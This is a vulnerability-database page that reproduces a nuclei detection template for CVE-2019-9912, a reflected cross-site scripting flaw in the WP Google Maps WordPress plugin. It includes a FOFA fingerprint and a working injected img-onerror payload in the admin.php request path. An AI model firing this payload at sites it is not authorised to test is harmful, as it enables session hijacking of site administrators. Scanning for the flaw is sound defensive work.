Lucene search
K

WP Google Maps < 7.10.43 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

WP Google Maps plugin prior to version 7.10.43 has medium severity XSS vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-9912
14 Dec 202405:39
circl
CNVD
WP Google Maps Cross-Site Scripting Vulnerability
22 Mar 201900:00
cnvd
CVE
CVE-2019-9912
21 Mar 201923:01
cve
Cvelist
CVE-2019-9912
21 Mar 201923:01
cvelist
EUVD
EUVD-2019-19267
7 Oct 202500:30
euvd
NVD
CVE-2019-9912
22 Mar 201900:29
nvd
OpenVAS
WordPress Google Maps Plugin < 7.10.43 XSS Vulnerability
28 Mar 201900:00
openvas
OSV
CVE-2019-9912
22 Mar 201900:29
osv
Patchstack
WordPress WP Google Maps plugin <= 7.10.41 - Cross-Site Scripting (XSS) vulnerability
22 Mar 201900:00
patchstack
Prion
Design/Logic Flaw
22 Mar 201900:29
prion
Rows per page
id: CVE-2019-9912

info:
  name: WP Google Maps < 7.10.43 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.
  impact: |
    Attackers can execute arbitrary scripts in the admin context, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to version 7.10.43 or later.
  reference:
    - https://lists.openwall.net/full-disclosure/2019/02/05/13
    - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9912
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9912
    cwe-id: CWE-79
    epss-score: 0.03028
    epss-percentile: 0.85753
    cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/wp-google-maps"
    vendor: codecabin
    product: wp_go_maps
  tags: cve,cve2019,wp,wp-plugin,wordpress,xss,wp-go-maps,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/wp-google-maps"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php/'\"><img src=x onerror=alert(document.domain)>?page=wp-google-maps-menu&action=foo"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><img src=x onerror=alert(document.domain)>"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022061166bb02e79010441c8692eba287489498f712a21e07ff57d32ea4153a53d9802210092b36582294bddd7b2cf0c6d1139adcffb786cd293b714bc36a9820c8161b642:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.03028
17